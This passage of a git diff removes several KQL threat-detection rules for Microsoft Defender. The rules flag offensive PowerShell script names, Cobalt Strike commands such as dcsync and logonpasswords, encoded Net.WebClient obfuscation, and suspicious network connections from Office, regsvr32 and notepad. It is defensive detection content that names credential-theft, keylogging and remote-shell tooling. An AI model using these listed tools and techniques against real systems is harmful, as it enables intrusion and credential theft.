endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith "\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1")
\ No newline at end of file
diff --git a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql b/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql
deleted file mode 100644
index 856b527b..00000000
--- a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/12
-// Level: medium
-// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
deleted file mode 100644
index 49fbaa43..00000000
--- a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs.
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql b/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql
deleted file mode 100644
index ec2bd99f..00000000
--- a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe"
\ No newline at end of file
diff --git a/Execution/Microsoft_Workflow_Compiler_Execution.kql b/Execution/Microsoft_Workflow_Compiler_Execution.kql
deleted file mode 100644
index fc3958d8..00000000
--- a/Execution/Microsoft_Workflow_Compiler_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nik Seetharaman, frack113
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.
-// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218
-DeviceProcessEvents
-| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe"
\ No newline at end of file
diff --git a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
deleted file mode 100644
index 3f152c7d..00000000
--- a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems),  Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA)
-// Date: 2022/08/14
-// Level: high
-// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...)
-
-// Tags: attack.defense_evasion, attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml")
\ No newline at end of file
diff --git a/Execution/Net_WebClient_Casing_Anomalies.kql b/Execution/Net_WebClient_Casing_Anomalies.kql
deleted file mode 100644
index f0456bb4..00000000
--- a/Execution/Net_WebClient_Casing_Anomalies.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/05/24
-// Level: high
-// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql b/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql
deleted file mode 100644
index 43a0fa9b..00000000
--- a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/14
-// Level: high
-// Description: Detects network connections from the Equation Editor process "eqnedt32.exe".
-// Tags: attack.execution, attack.t1203
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe"
\ No newline at end of file
diff --git a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql
deleted file mode 100644
index fece3237..00000000
--- a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Dmitriy Lifanov, oscd.community
-// Date: 2019/10/25
-// Level: medium
-// Description: Detects a network connection initiated by "Regsvr32.exe"
-// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql
deleted file mode 100644
index 8e765072..00000000
--- a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: EagleEye Team
-// Date: 2020/05/14
-// Level: high
-// Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
-// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/Execution/New_Application_in_AppCompat.kql b/Execution/New_Application_in_AppCompat.kql
deleted file mode 100644
index 65adc423..00000000
--- a/Execution/New_Application_in_AppCompat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: informational
-// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
-// Tags: attack.execution, attack.t1204.002
-DeviceRegistryEvents
-| where RegistryKey contains "\\AppCompatFlags\\Compatibility Assistant\\Store"
\ No newline at end of file
diff --git a/Execution/New_Process_Created_Via_Wmic.EXE.kql b/Execution/New_Process_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index 77159755..00000000
--- a/Execution/New_Process_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects new process creation using WMIC via the "process call create" flag
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql b/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql
deleted file mode 100644
index d02933f8..00000000
--- a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/15
-// Level: medium
-// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql b/Execution/Non_Interactive_PowerShell_Process_Spawned.kql
deleted file mode 100644
index f604fb6e..00000000
--- a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
-// Date: 2019/09/12
-// Level: low
-// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent.
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe"))))
\ No newline at end of file
diff --git a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql b/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql
deleted file mode 100644
index 421decbc..00000000
--- a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2021/11/10
-// Level: medium
-// Description: Detects an office application (Word, Excel, PowerPoint)  that initiate a network connection to a non-private IP addresses.
-This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
-This rule will require an initial baseline and tuning that is specific to your organization.
-
-// Tags: attack.execution, attack.t1203
-DeviceNetworkEvents
-| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql
deleted file mode 100644
index f62f88b2..00000000
--- a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/05/06
-// Level: high
-// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell
-// Tags: attack.execution, attack.t1059.003, stp.1u
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql
deleted file mode 100644
index ec317b49..00000000
--- a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: _pete_0, TheDFIRReport
-// Date: 2022/05/06
-// Level: high
-// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe")
\ No newline at end of file
diff --git a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql b/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql
deleted file mode 100644
index d47a865d..00000000
--- a/Execution/Outbound_Network_Connection_Initiated_By_Microsoft_Dialer.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: CertainlyP
-// Date: 2024/04/26
-// Level: high
-// Description: Detects outbound network connection initiated by Microsoft Dialer.
